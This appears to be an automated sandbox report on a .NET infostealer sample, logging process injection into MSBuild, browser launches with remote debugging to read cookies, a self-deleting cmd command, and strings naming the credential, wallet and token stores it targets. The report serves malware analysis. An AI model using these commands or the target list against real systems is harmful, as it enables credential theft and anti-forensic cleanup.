Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe File created: C:\Users\user\AppData\Local\Temp\9ede9d47-1663-42f5-9505-d812d516d5eb.tmp
Source: x9Lh8czsmo.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: hlfctr90h.2.dr, pph4eu37q.2.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: x9Lh8czsmo.exe, 00000000.00000000.1411563937.00000000002C2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: update [{0}] set data = @data, revision = @next_revision where id = @id and revision = @current_revisionMdelete from [{0}] where saga_id = @id;
Source: x9Lh8czsmo.exe ReversingLabs: Detection: 52%
Source: x9Lh8czsmo.exe Virustotal: Detection: 43%
Source: x9Lh8czsmo.exe String found in binary or memory: {1})rebus-return-address
Source: unknown Process created: C:\Users\user\Desktop\x9Lh8czsmo.exe "C:\Users\user\Desktop\x9Lh8czsmo.exe"
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2240,i,16205972943544500368,14203000740554980435,262144 /prefetch:8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3056 --field-trial-handle=2416,i,3783916460290687483,12681032264984015076,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6660 --field-trial-handle=2416,i,3783916460290687483,12681032264984015076,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6904 --field-trial-handle=2416,i,3783916460290687483,12681032264984015076,262144 /prefetch:8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\qimg4" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\qimg4" & exit Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2240,i,16205972943544500368,14203000740554980435,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3056 --field-trial-handle=2416,i,3783916460290687483,12681032264984015076,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6660 --field-trial-handle=2416,i,3783916460290687483,12681032264984015076,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6904 --field-trial-handle=2416,i,3783916460290687483,12681032264984015076,262144 /prefetch:8 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: x9Lh8czsmo.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: x9Lh8czsmo.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: x9Lh8czsmo.exe Static file information: File size 2018680 > 1048576
Source: x9Lh8czsmo.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1eb000
Source: x9Lh8czsmo.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: vdr1.pdb source: x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B84000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram 
Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: x9Lh8czsmo.exe, 00000000.00000002.1443815308.0000000005D60000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: x9Lh8czsmo.exe, 00000000.00000002.1443815308.0000000005D60000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: x9Lh8czsmo.exe, LocatorTransaction.cs .Net Code: ClearBasicLocator System.Reflection.Assembly.Load(byte[])
Source: x9Lh8czsmo.exe, ScopeExtractor.cs .Net Code: EncodeIntegratedAdapter
Source: 0.2.x9Lh8czsmo.exe.5cd0000.10.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.x9Lh8czsmo.exe.5cd0000.10.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.x9Lh8czsmo.exe.5cd0000.10.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.x9Lh8czsmo.exe.5cd0000.10.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.x9Lh8czsmo.exe.5cd0000.10.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 0.2.x9Lh8czsmo.exe.3abc5f0.0.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.x9Lh8czsmo.exe.3abc5f0.0.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.x9Lh8czsmo.exe.3abc5f0.0.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.x9Lh8czsmo.exe.3abc5f0.0.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.x9Lh8czsmo.exe.3abc5f0.0.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.3a355b0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.39b5db8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.39b5db8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.5c20000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.5c20000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.3975d98.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.3a355b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1440562957.0000000003971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1443052351.0000000005C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1426071903.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: x9Lh8czsmo.exe PID: 7828, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_0040E886
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05C91BE3 pushad ; ret 0_2_05C91BE6
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB3D98 pushfd ; ret 0_2_05CB3D9B
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB8D9F push FFFFFF86h; retf 0_2_05CB8DDA
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5DAD push esp; retf 0_2_05CB5DAE
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB6D03 push 6AD005CBh; retf 0_2_05CB6D0E
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5D1B push 00000020h; retf 0_2_05CB5D22
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB8D1F push FFFFFF86h; retf 0_2_05CB8DDA
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5CF3 push eax; retf 0_2_05CB5CFE
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5C1B push 4905CB1Ah; retf 0_2_05CB5C25
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5F14 push edx; retf 0_2_05CB5F1A
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5F33 push ecx; retf 0_2_05CB5F46
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5E8B push cs; retf 0_2_05CB5E92
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5E83 push cs; retf 0_2_05CB5E92
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5EB7 push es; retf 0_2_05CB5EBE
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5E5B push esp; retf 0_2_05CB5E62
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB59D3 push edx; retf 0_2_05CB59DE
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB59E7 push ss; retf 0_2_05CB59EE
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5943 push bx; retf 0_2_05CB594A
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5963 push ss; retf 0_2_05CB5972
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB78EF push 00000074h; retf 0_2_05CB78F6
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB7867 push 00000074h; retf 0_2_05CB78F6
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5BF3 push esp; retf 0_2_05CB5C12
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5B47 push esi; retf 0_2_05CB5B52
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5AAF push edx; retf 0_2_05CB5AC6
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5A67 push ebx; retf 0_2_05CB5A6E
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D20DE8 push eax; retf 0_2_05D20DE9
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D26D9D pushfd ; retf 0000h 0_2_05D26DA2
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D23D51 push eax; iretd 0_2_05D23D52
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D25417 push eax; iretd 0_2_05D25418
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D2AFE6 push eax; iretd 0_2_05D2AFEB
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D2CF90 pushad ; iretd 0_2_05D2CF91
Source: x9Lh8czsmo.exe Static PE information: section name: .text entropy: 7.199089272024581

Boot Survival

barindex
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jump to behavior
